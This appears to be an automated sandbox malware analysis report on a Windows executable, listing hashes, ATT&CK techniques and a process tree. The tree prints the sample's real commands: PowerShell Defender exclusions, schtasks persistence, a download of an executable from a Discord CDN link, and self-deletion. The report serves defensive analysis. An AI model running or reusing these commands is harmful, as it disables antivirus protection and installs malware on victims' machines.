d78e0011d88c18f1112d29e0f06e443291d560cd2b60481e7f9c637b85ab5655

Analysis

max time kernel
147s
max time network
127s
platform
windows10-2004_x64
resource
win10v2004-20241007-en
resource tags

arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system
submitted
09/10/2024, 04:42

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

2b07301cc54a9b929bede689a4746e66_JaffaCakes118.exe
Size

659KB
MD5

2b07301cc54a9b929bede689a4746e66
SHA1

33f5ab7d47163d08d677522e4eabad3777269da2
SHA256

d78e0011d88c18f1112d29e0f06e443291d560cd2b60481e7f9c637b85ab5655
SHA512

a3b2e6cde7855cdec911e84b3cfa3369264a97e431a43c118fe0d668cd38b435503b4edb82ed9f54887383b2ef95d23d2d5469579c4279b1d67e7b21d9a94ff3
SSDEEP

12288:K+38DKkPiYRvUEHHOWAap90A6In+CkjFGxk04xrW:18DKkP3dHHuTICQB

Score

8^/10

discovery execution upx

Malware Config

Signatures

Command and Scripting Interpreter: PowerShell 1 TTPs 8 IoCs

Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.

execution

PowerShell

T1059.001

pid	Process
4944	powershell.exe
2572	powershell.exe
2756	powershell.exe
3500	powershell.exe
3320	powershell.exe
2068	powershell.exe
4852	powershell.exe
1372	powershell.exe

Checks computer location settings 2 TTPs 5 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000\Control Panel\International\Geo\Nation	2b07301cc54a9b929bede689a4746e66_JaffaCakes118.exe
Key value queried	\REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000\Control Panel\International\Geo\Nation	WindowsDefender.exe
Key value queried	\REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000\Control Panel\International\Geo\Nation	svchost32.exe
Key value queried	\REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000\Control Panel\International\Geo\Nation	services32.exe
Key value queried	\REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000\Control Panel\International\Geo\Nation	svchost32.exe

Executes dropped EXE 10 IoCs

pid	Process
3848	WindowsDefender.exe
5088	UpdateChecker.exe
2024	extd.exe
3620	extd.exe
1604	extd.exe
3948	extd.exe
2100	svchost32.exe
2796	services32.exe
1008	svchost32.exe
4032	sihost32.exe

Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs

Web Service

T1102

flow	ioc
23	raw.githubusercontent.com
24	raw.githubusercontent.com

Drops file in System32 directory 4 IoCs

description	ioc	Process
File opened for modification	C:\Windows\system32\services32.exe	svchost32.exe
File created	C:\Windows\system32\Microsoft\Telemetry\sihost32.exe	svchost32.exe
File created	C:\Windows\system32\Microsoft\Telemetry\sihost32.log	svchost32.exe
File created	C:\Windows\system32\services32.exe	svchost32.exe

UPX packed file 6 IoCs

Detects executables packed with UPX/modified UPX open source packer.

upx

resource	yara_rule
behavioral2/files/0x0007000000023cbb-36.dat	upx
behavioral2/memory/2024-38-0x0000000140000000-0x00000001400D8000-memory.dmp	upx
behavioral2/memory/2024-40-0x0000000140000000-0x00000001400D8000-memory.dmp	upx
behavioral2/memory/3620-53-0x0000000140000000-0x00000001400D8000-memory.dmp	upx
behavioral2/memory/1604-73-0x0000000140000000-0x00000001400D8000-memory.dmp	upx
behavioral2/memory/3948-114-0x0000000140000000-0x00000001400D8000-memory.dmp	upx

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

System Location Discovery: System Language Discovery 1 TTPs 2 IoCs

Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

discovery

System Language Discovery

T1614.001

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	NOTEPAD.EXE
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	2b07301cc54a9b929bede689a4746e66_JaffaCakes118.exe

Modifies registry class 1 IoCs

description	ioc	Process
Key created	\REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000_Classes\Local Settings	2b07301cc54a9b929bede689a4746e66_JaffaCakes118.exe

Scheduled Task/Job: Scheduled Task 1 TTPs 2 IoCs

Schtasks is often used by malware for persistence or to perform post-infection execution.

persistence execution

Scheduled Task

T1053.005

pid	Process
2988	schtasks.exe
4980	schtasks.exe

Suspicious behavior: EnumeratesProcesses 18 IoCs

pid	Process
3500	powershell.exe
3500	powershell.exe
3320	powershell.exe
3320	powershell.exe
2068	powershell.exe
2068	powershell.exe
4852	powershell.exe
4852	powershell.exe
2100	svchost32.exe
1372	powershell.exe
1372	powershell.exe
4944	powershell.exe
4944	powershell.exe
2572	powershell.exe
2572	powershell.exe
2756	powershell.exe
2756	powershell.exe
1008	svchost32.exe

Suspicious use of AdjustPrivilegeToken 10 IoCs

description	pid	Process
Token: SeDebugPrivilege	3500	powershell.exe
Token: SeDebugPrivilege	3320	powershell.exe
Token: SeDebugPrivilege	2068	powershell.exe
Token: SeDebugPrivilege	4852	powershell.exe
Token: SeDebugPrivilege	2100	svchost32.exe
Token: SeDebugPrivilege	1372	powershell.exe
Token: SeDebugPrivilege	4944	powershell.exe
Token: SeDebugPrivilege	2572	powershell.exe
Token: SeDebugPrivilege	2756	powershell.exe
Token: SeDebugPrivilege	1008	svchost32.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 3660 wrote to memory of 3848	3660	2b07301cc54a9b929bede689a4746e66_JaffaCakes118.exe	86
PID 3660 wrote to memory of 3848	3660	2b07301cc54a9b929bede689a4746e66_JaffaCakes118.exe	86
PID 3660 wrote to memory of 5088	3660	2b07301cc54a9b929bede689a4746e66_JaffaCakes118.exe	87
PID 3660 wrote to memory of 5088	3660	2b07301cc54a9b929bede689a4746e66_JaffaCakes118.exe	87
PID 3660 wrote to memory of 1624	3660	2b07301cc54a9b929bede689a4746e66_JaffaCakes118.exe	89
PID 3660 wrote to memory of 1624	3660	2b07301cc54a9b929bede689a4746e66_JaffaCakes118.exe	89
PID 3660 wrote to memory of 1624	3660	2b07301cc54a9b929bede689a4746e66_JaffaCakes118.exe	89
PID 3848 wrote to memory of 1008	3848	WindowsDefender.exe	90
PID 3848 wrote to memory of 1008	3848	WindowsDefender.exe	90
PID 5088 wrote to memory of 932	5088	UpdateChecker.exe	92
PID 5088 wrote to memory of 932	5088	UpdateChecker.exe	92
PID 932 wrote to memory of 2024	932	cmd.exe	93
PID 932 wrote to memory of 2024	932	cmd.exe	93
PID 1008 wrote to memory of 3500	1008	cmd.exe	94
PID 1008 wrote to memory of 3500	1008	cmd.exe	94
PID 932 wrote to memory of 3620	932	cmd.exe	95
PID 932 wrote to memory of 3620	932	cmd.exe	95
PID 932 wrote to memory of 1604	932	cmd.exe	96
PID 932 wrote to memory of 1604	932	cmd.exe	96
PID 1008 wrote to memory of 3320	1008	cmd.exe	97
PID 1008 wrote to memory of 3320	1008	cmd.exe	97
PID 1008 wrote to memory of 2068	1008	cmd.exe	98
PID 1008 wrote to memory of 2068	1008	cmd.exe	98
PID 1008 wrote to memory of 4852	1008	cmd.exe	99
PID 1008 wrote to memory of 4852	1008	cmd.exe	99
PID 932 wrote to memory of 3948	932	cmd.exe	101
PID 932 wrote to memory of 3948	932	cmd.exe	101
PID 3848 wrote to memory of 3688	3848	WindowsDefender.exe	102
PID 3848 wrote to memory of 3688	3848	WindowsDefender.exe	102
PID 3688 wrote to memory of 2100	3688	cmd.exe	104
PID 3688 wrote to memory of 2100	3688	cmd.exe	104
PID 2100 wrote to memory of 2328	2100	svchost32.exe	105
PID 2100 wrote to memory of 2328	2100	svchost32.exe	105
PID 2328 wrote to memory of 2988	2328	cmd.exe	107
PID 2328 wrote to memory of 2988	2328	cmd.exe	107
PID 2100 wrote to memory of 2796	2100	svchost32.exe	108
PID 2100 wrote to memory of 2796	2100	svchost32.exe	108
PID 2100 wrote to memory of 1576	2100	svchost32.exe	109
PID 2100 wrote to memory of 1576	2100	svchost32.exe	109
PID 2796 wrote to memory of 1720	2796	services32.exe	111
PID 2796 wrote to memory of 1720	2796	services32.exe	111
PID 1720 wrote to memory of 1372	1720	cmd.exe	113
PID 1720 wrote to memory of 1372	1720	cmd.exe	113
PID 1576 wrote to memory of 1680	1576	cmd.exe	114
PID 1576 wrote to memory of 1680	1576	cmd.exe	114
PID 1720 wrote to memory of 4944	1720	cmd.exe	115
PID 1720 wrote to memory of 4944	1720	cmd.exe	115
PID 1720 wrote to memory of 2572	1720	cmd.exe	116
PID 1720 wrote to memory of 2572	1720	cmd.exe	116
PID 1720 wrote to memory of 2756	1720	cmd.exe	117
PID 1720 wrote to memory of 2756	1720	cmd.exe	117
PID 2796 wrote to memory of 3524	2796	services32.exe	122
PID 2796 wrote to memory of 3524	2796	services32.exe	122
PID 3524 wrote to memory of 1008	3524	cmd.exe	124
PID 3524 wrote to memory of 1008	3524	cmd.exe	124
PID 1008 wrote to memory of 3540	1008	svchost32.exe	125
PID 1008 wrote to memory of 3540	1008	svchost32.exe	125
PID 1008 wrote to memory of 4032	1008	svchost32.exe	127
PID 1008 wrote to memory of 4032	1008	svchost32.exe	127
PID 3540 wrote to memory of 4980	3540	cmd.exe	128
PID 3540 wrote to memory of 4980	3540	cmd.exe	128
PID 1008 wrote to memory of 532	1008	svchost32.exe	132
PID 1008 wrote to memory of 532	1008	svchost32.exe	132
PID 532 wrote to memory of 5096	532	cmd.exe	134

Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
persistence

Query Registry
T1012

C:\Users\Admin\AppData\Local\Temp\2b07301cc54a9b929bede689a4746e66_JaffaCakes118.exe
"C:\Users\Admin\AppData\Local\Temp\2b07301cc54a9b929bede689a4746e66_JaffaCakes118.exe"
1⤵
- Checks computer location settings
- System Location Discovery: System Language Discovery
- Modifies registry class
- Suspicious use of WriteProcessMemory
PID:3660
- C:\Users\Admin\AppData\Local\Temp\WindowsDefender.exe
  "C:\Users\Admin\AppData\Local\Temp\WindowsDefender.exe"
  2⤵
  - Checks computer location settings
  - Executes dropped EXE
  - Suspicious use of WriteProcessMemory
  PID:3848
- - C:\Windows\SYSTEM32\cmd.exe
    "cmd" /c powershell -Command Add-MpPreference -ExclusionPath '%UserProfile%' & powershell -Command Add-MpPreference -ExclusionPath '%AppData%' & powershell -Command Add-MpPreference -ExclusionPath '%Temp%' & powershell -Command Add-MpPreference -ExclusionPath '%SystemRoot%' & exit
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:1008
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin'
      4⤵
      Command and Scripting Interpreter: PowerShell
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:3500
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming'
      4⤵
      Command and Scripting Interpreter: PowerShell
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:3320
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp'
      4⤵
      Command and Scripting Interpreter: PowerShell
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:2068
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell -Command Add-MpPreference -ExclusionPath 'C:\Windows'
      4⤵
      Command and Scripting Interpreter: PowerShell
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:4852
- - C:\Windows\System32\cmd.exe
    "C:\Windows\System32\cmd.exe" /c C:\Users\Admin\AppData\Local\Temp\svchost32.exe "C:\Users\Admin\AppData\Local\Temp\WindowsDefender.exe"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:3688
  - - C:\Users\Admin\AppData\Local\Temp\svchost32.exe
      C:\Users\Admin\AppData\Local\Temp\svchost32.exe "C:\Users\Admin\AppData\Local\Temp\WindowsDefender.exe"
      4⤵
      Checks computer location settings
      Executes dropped EXE
      Drops file in System32 directory
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      Suspicious use of WriteProcessMemory
      PID:2100
    - - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "services32" /tr '"C:\Windows\system32\services32.exe"' & exit
        5⤵
        Suspicious use of WriteProcessMemory
        
        PID:2328
      - C:\Windows\system32\schtasks.exe
        
        schtasks /create /f /sc onlogon /rl highest /tn "services32" /tr '"C:\Windows\system32\services32.exe"'
        6⤵
        Scheduled Task/Job: Scheduled Task
        
        PID:2988
    - - C:\Windows\system32\services32.exe
        
        "C:\Windows\system32\services32.exe"
        5⤵
        Checks computer location settings
        Executes dropped EXE
        Suspicious use of WriteProcessMemory
        
        PID:2796
      - C:\Windows\system32\cmd.exe
        
        "cmd" /c powershell -Command Add-MpPreference -ExclusionPath '%UserProfile%' & powershell -Command Add-MpPreference -ExclusionPath '%AppData%' & powershell -Command Add-MpPreference -ExclusionPath '%Temp%' & powershell -Command Add-MpPreference -ExclusionPath '%SystemRoot%' & exit
        6⤵
        Suspicious use of WriteProcessMemory
        
        PID:1720
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin'
        7⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:1372
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming'
        7⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:4944
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp'
        7⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:2572
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command Add-MpPreference -ExclusionPath 'C:\Windows'
        7⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:2756
      - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c C:\Users\Admin\AppData\Local\Temp\svchost32.exe "C:\Windows\system32\services32.exe"
        6⤵
        Suspicious use of WriteProcessMemory
        
        PID:3524
        
        C:\Users\Admin\AppData\Local\Temp\svchost32.exe
        
        C:\Users\Admin\AppData\Local\Temp\svchost32.exe "C:\Windows\system32\services32.exe"
        7⤵
        Checks computer location settings
        Executes dropped EXE
        Drops file in System32 directory
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        Suspicious use of WriteProcessMemory
        
        PID:1008
        
        C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "services32" /tr '"C:\Windows\system32\services32.exe"' & exit
        8⤵
        Suspicious use of WriteProcessMemory
        
        PID:3540
        
        C:\Windows\system32\schtasks.exe
        
        schtasks /create /f /sc onlogon /rl highest /tn "services32" /tr '"C:\Windows\system32\services32.exe"'
        9⤵
        Scheduled Task/Job: Scheduled Task
        
        PID:4980
        
        C:\Windows\system32\Microsoft\Telemetry\sihost32.exe
        
        "C:\Windows\system32\Microsoft\Telemetry\sihost32.exe"
        8⤵
        Executes dropped EXE
        
        PID:4032
        
        C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Temp\svchost32.exe"
        8⤵
        Suspicious use of WriteProcessMemory
        
        PID:532
        
        C:\Windows\system32\choice.exe
        
        choice /C Y /N /D Y /T 3
        9⤵
        
        PID:5096
    - - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Temp\svchost32.exe"
        5⤵
        Suspicious use of WriteProcessMemory
        
        PID:1576
      - C:\Windows\system32\choice.exe
        
        choice /C Y /N /D Y /T 3
        6⤵
        
        PID:1680
- C:\Users\Admin\AppData\Local\Temp\UpdateChecker.exe
  "C:\Users\Admin\AppData\Local\Temp\UpdateChecker.exe"
  2⤵
  - Executes dropped EXE
  - Suspicious use of WriteProcessMemory
  PID:5088
- - C:\Windows\system32\cmd.exe
    "C:\Windows\system32\cmd" /c "C:\Users\Admin\AppData\Local\Temp\C16B.tmp\C16C.tmp\C16D.bat C:\Users\Admin\AppData\Local\Temp\UpdateChecker.exe"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:932
  - - C:\Users\Admin\AppData\Local\Temp\C16B.tmp\C16C.tmp\extd.exe
      C:\Users\Admin\AppData\Local\Temp\C16B.tmp\C16C.tmp\extd.exe "/hideself" "" "" "" "" "" "" "" ""
      4⤵
      Executes dropped EXE
      PID:2024
  - - C:\Users\Admin\AppData\Local\Temp\C16B.tmp\C16C.tmp\extd.exe
      C:\Users\Admin\AppData\Local\Temp\C16B.tmp\C16C.tmp\extd.exe "/random" "90000009" "" "" "" "" "" "" ""
      4⤵
      Executes dropped EXE
      PID:3620
  - - C:\Users\Admin\AppData\Local\Temp\C16B.tmp\C16C.tmp\extd.exe
      C:\Users\Admin\AppData\Local\Temp\C16B.tmp\C16C.tmp\extd.exe "/download" "https://cdn.discordapp.com/attachments/868908533897363470/872884812841648218/1622305117.exe" "1622305117.exe" "" "" "" "" "" ""
      4⤵
      Executes dropped EXE
      PID:1604
  - - C:\Users\Admin\AppData\Local\Temp\C16B.tmp\C16C.tmp\extd.exe
      C:\Users\Admin\AppData\Local\Temp\C16B.tmp\C16C.tmp\extd.exe "/sleep" "900000" "" "" "" "" "" "" ""
      4⤵
      Executes dropped EXE
      PID:3948
- C:\Windows\SysWOW64\NOTEPAD.EXE
  "C:\Windows\system32\NOTEPAD.EXE" C:\Users\Admin\AppData\Local\Temp\ERROR REPORT.txt
  2⤵
  - System Location Discovery: System Language Discovery
  PID:1624

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

PowerShell

T1059.001

Scheduled Task/Job

T1053

Scheduled Task

T1053.005

Persistence

Scheduled Task/Job

T1053

Scheduled Task

T1053.005

Privilege Escalation

Scheduled Task/Job

T1053

Scheduled Task

T1053.005

Defense Evasion

Credential Access

Discovery

Query Registry

T1012

System Information Discovery

T1082

System Location Discovery

T1614

System Language Discovery

T1614.001

Lateral Movement

Collection

Command and Control

Web Service

T1102

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

Filesize
2KB

MD5
d85ba6ff808d9e5444a4b369f5bc2730

SHA1
31aa9d96590fff6981b315e0b391b575e4c0804a

SHA256
84739c608a73509419748e4e20e6cc4e1846056c3fe1929a8300d5a1a488202f

SHA512
8c414eb55b45212af385accc16d9d562adba2123583ce70d22b91161fe878683845512a78f04dedd4ea98ed9b174dbfa98cf696370598ad8e6fbd1e714f1f249

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\svchost32.exe.log

Filesize
539B

MD5
b245679121623b152bea5562c173ba11

SHA1
47cb7fc4cf67e29a87016a7308cdb8b1b4dc8e3d

SHA256
73d84fd03e38f1bbf8b2218f8a454f0879051855252fc76b63f20f46e7fd877f

SHA512
75e46843b1eafcc7dc4362630838895b7f399e57662a12bf0305a912c8e726b02e0a760b1b97a2c262b2d05fdb944b9ed81c338ad93e5eb5cb57bc651602e42c

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
944B

MD5
d8cb3e9459807e35f02130fad3f9860d

SHA1
5af7f32cb8a30e850892b15e9164030a041f4bd6

SHA256
2b139c74072ccbdaa17b950f32a6dbc934dfb7af9973d97c9b0d9c498012ba68

SHA512
045239ba31367fbdd59e883f74eafc05724e23bd6e8f0c1e7171ea2496a497eb9e0cfcb57285bb81c4d569daadba43d6ef64c626ca48f1e2a59e8d97f0cc9184

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
944B

MD5
6d14ccefeb263594e60b1765e131f7a3

SHA1
4a9ebdc0dff58645406c40b7b140e1b174756721

SHA256
57cd435c8b2bf10a2c77698301789c032e1b6b623ff1420c72e8bca0b10f1e5c

SHA512
2013a26123f72a4106524fd9d7389ac4654f97033d22707efc084fb2a3ad01c298eb64f01bb64861ab603615022dbe7cfc97475346edb16b3ba72e905127f101

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
944B

MD5
9bc110200117a3752313ca2acaf8a9e1

SHA1
fda6b7da2e7b0175b391475ca78d1b4cf2147cd3

SHA256
c88e4bbb64f7fa31429ebe82c1cf07785c44486f37576f783a26ac856e02a4eb

SHA512
1f1af32aa18a8cbfcc65b0d4fb7e6ca2705f125eaa85789e981ee68b90c64522e954825abf460d4b4f97567715dfae8d9b0a25a4d54d10bc4c257c472f2e80fb

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
944B

MD5
735388b98281cec7d063b1b470c13632

SHA1
7536ce1c5f3732fac491d7038e24124551c4290a

SHA256
843fced254477f5ad803cc98e853d7ab674852d5e94bc174497691b736d49e69

SHA512
30244c596f4c3cc0194186a210170f04985b77fc90f10cff0a2fbd07e079944e5f8c9998759219363033c450b6a4093ad1b3d75e0a0fae1aa6208a61a88a9717

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
944B

MD5
77d622bb1a5b250869a3238b9bc1402b

SHA1
d47f4003c2554b9dfc4c16f22460b331886b191b

SHA256
f97ff12a8abf4bf88bb6497bd2ac2da12628c8847a8ba5a9026bdbb76507cdfb

SHA512
d6789b5499f23c9035375a102271e17a8a82e57d6f5312fa24242e08a83efdeb8becb7622f55c4cf1b89c7d864b445df11f4d994cf7e2f87a900535bcca12fd9

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
944B

MD5
67e8893616f805af2411e2f4a1411b2a

SHA1
39bf1e1a0ddf46ce7c136972120f512d92827dcd

SHA256
ca0dfe104c1bf27f7e01999fcdabc16c6400c3da937c832c26bdbca322381d31

SHA512
164e911a9935e75c8be1a6ec3d31199a16ba2a1064da6c09d771b2a38dd7fddd142301ef55d67d90f306d3a454a1ce7b72e129ea42e44500b9b8c623a8d98b4d

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
944B

MD5
037d47adbb4a6287669fec7b7156f670

SHA1
3a662f209e7d1d8b98835cb3e49aefa59d66beb8

SHA256
9ae7b4d6e1c20e1af47b8e4c961d41557a2b02f114b73db1be0cf2ba310f65d0

SHA512
f7fe6556010eb58cd388e1066f63981b2a396b85739f897dfb1fa81f49aeea8d95d3ee012479a39ad27e553d77c7f5cf88adf2640fa3eeebf8e4fc03176665fb

Download Submit
C:\Users\Admin\AppData\Local\Temp\5861\1622305117.exe

Filesize
36B

MD5
a1ca4bebcd03fafbe2b06a46a694e29a

SHA1
ffc88125007c23ff6711147a12f9bba9c3d197ed

SHA256
c3fa59901d56ce8a95a303b22fd119cb94abf4f43c4f6d60a81fd78b7d00fa65

SHA512
6fe1730bf2a6bba058c5e1ef309a69079a6acca45c0dbca4e7d79c877257ac08e460af741459d1e335197cf4de209f2a2997816f2a2a3868b2c8d086ef789b0e

Download Submit
C:\Users\Admin\AppData\Local\Temp\C16B.tmp\C16C.tmp\C16D.bat

Filesize
943B

MD5
881e86e57c671bfdae65592e9139563d

SHA1
ff756f5e37e2c8d38e241a5aa80007dc6feedc3a

SHA256
c228e7eee279b8a2b90f654a2dec7328a01d58811d979829b2dec6269df3a2ea

SHA512
bcb82c981bd214e8d6dfda4cc714602df0258dad33746a0cefd20c4c59a20d7980c219c59fd3d54d5edd9a30e80753cf0045c765cc377d32db499b2a481deee9

Download Submit
C:\Users\Admin\AppData\Local\Temp\C16B.tmp\C16C.tmp\extd.exe

Filesize
326KB

MD5
c14ce13ab09b4829f67a879d735a10a1

SHA1
537e1ce843f07ce629699ef5742c42ee2f06e9b6

SHA256
ef2699ba677fcdb8a3b70a711a59a5892d8439e108e3ac4d27a7f946c4d01a4a

SHA512
c1cf8eb4a5ca6539e5d2608c2085e7804ca77b7244aa7bfa7e1dde30cb88b9a4e6bb9e3d80304b7d8825355eab63d05e6425fa8267a9d20ac5f1998bed05fa38

Download Submit
C:\Users\Admin\AppData\Local\Temp\ERROR REPORT.txt

Filesize
617B

MD5
292806f9ebd655b601d4fe9e9c482d9f

SHA1
be73ffc844d1071a6a98131861c39e29ca5b8d8c

SHA256
c7c19f3cb0e3c8f820c36fa809d20ed776d2312314b81e1ccb6098fdc541c55e

SHA512
a3468990b4867f3722de1040cdd720cc72cfa590b3643db1aa6a8d5293e4a09f73c5f9f7f5914cd2bf5d0a1cdc6283e9396bfd90574a41003d8397fa67bcc6dd

Download Submit
C:\Users\Admin\AppData\Local\Temp\UpdateChecker.exe

Filesize
463KB

MD5
4688f9213eca02fc2123cea8b446dae2

SHA1
5e7cc6dd95a2562e0e5c73faaaf698aee5e83542

SHA256
c4964f84993788df3057cd3f1859e48e360ced0a6e7405a91b34cd8c1a4a51c0

SHA512
f32ac1aba5297eacc56de1583c51df027fd879f75b90331adc3148299ad10ae83b5ca64520ad14294085b72c3c84e832a079e58d42e7aba1d308517c23017086

Download Submit
C:\Users\Admin\AppData\Local\Temp\WindowsDefender.exe

Filesize
418KB

MD5
34f1d89bf3956c41c59a4ca83dc427c3

SHA1
ed6af125766c122136fa20adbdf18f2e7a84e9a5

SHA256
b812ff55e49d24e0a34b564027c134ec885e99e108ab560bb8e4f1abae66357f

SHA512
77e226379d5bf8faa1960bc6c1c7c4fdc147b4ff3dbd54db79f668f2971a7164ec2cb248635d88cff82f63730614829cc35eac08b3b29a66d92d98d2cb5ad811

Download Submit
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_1hneed0e.cye.ps1

Filesize
60B

MD5
d17fe0a3f47be24a6453e9ef58c94641

SHA1
6ab83620379fc69f80c0242105ddffd7d98d5d9d

SHA256
96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

SHA512
5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

Download Submit
C:\Users\Admin\AppData\Local\Temp\svchost32.exe

Filesize
118KB

MD5
2b133052f5681aefb73e4dd61eb247a1

SHA1
018321bfc530e2965cf8156bbba281d2bc7be991

SHA256
2e15ceff23a09781003cd0a5b4299846dab4f81bdaaa523e3adc3967d03c4a9f

SHA512
61cfc0b36aec27ffa1a1585a544570e7c4bc72e3d603949f08b55141fe332360d1c0c81c48e587ec24f1f5b0cb0fb3e66f6f902584aa21091ef7f0853c2dc232

Download Submit
C:\Windows\System32\Microsoft\Telemetry\sihost32.exe

Filesize
51KB

MD5
37277e86b948998ac9bca9c9ec172458

SHA1
e6ae070ca44ef6a922d2c2be7248dc6b13195e90

SHA256
09faf09a92ee474033f4c2af231e353a8dca5ea18a30e533a4b247901b426068

SHA512
61259d20caf3fdae0ca08a92ec8b57f8e381c58fc5f80f328cf74f2d8be744fc6f574c7f3d36ef563d554d7d3a24e69d87146803033f8a3e5cc0e2737d335987

Download Submit
memory/1604-73-0x0000000140000000-0x00000001400D8000-memory.dmp

Filesize
864KB

Download
memory/2024-40-0x0000000140000000-0x00000001400D8000-memory.dmp

Filesize
864KB

Download
memory/2024-38-0x0000000140000000-0x00000001400D8000-memory.dmp

Filesize
864KB

Download
memory/2100-112-0x0000000001D40000-0x0000000001D52000-memory.dmp

Filesize
72KB

Download
memory/2100-110-0x0000000000F10000-0x0000000000F32000-memory.dmp

Filesize
136KB

Download
memory/2100-111-0x0000000001CF0000-0x0000000001D02000-memory.dmp

Filesize
72KB

Download
memory/3500-51-0x000002567E160000-0x000002567E182000-memory.dmp

Filesize
136KB

Download
memory/3620-53-0x0000000140000000-0x00000001400D8000-memory.dmp

Filesize
864KB

Download
memory/3660-0-0x0000000074702000-0x0000000074703000-memory.dmp

Filesize
4KB

Download
memory/3660-1-0x0000000074700000-0x0000000074CB1000-memory.dmp

Filesize
5.7MB

Download
memory/3660-2-0x0000000074700000-0x0000000074CB1000-memory.dmp

Filesize
5.7MB

Download
memory/3660-29-0x0000000074700000-0x0000000074CB1000-memory.dmp

Filesize
5.7MB

Download
memory/3848-102-0x00007FFD4F073000-0x00007FFD4F075000-memory.dmp

Filesize
8KB

Download
memory/3848-106-0x00007FFD4F070000-0x00007FFD4FB31000-memory.dmp

Filesize
10.8MB

Download
